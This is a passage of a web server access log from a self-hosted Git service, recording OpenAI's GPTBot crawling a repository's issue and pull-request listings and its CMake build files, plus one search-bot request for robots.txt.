192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14333] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11142] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14348] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14347] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14333] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14332] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14346] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:17 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14346] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14336] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11374] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11370] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 11105] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:19:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26377] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr 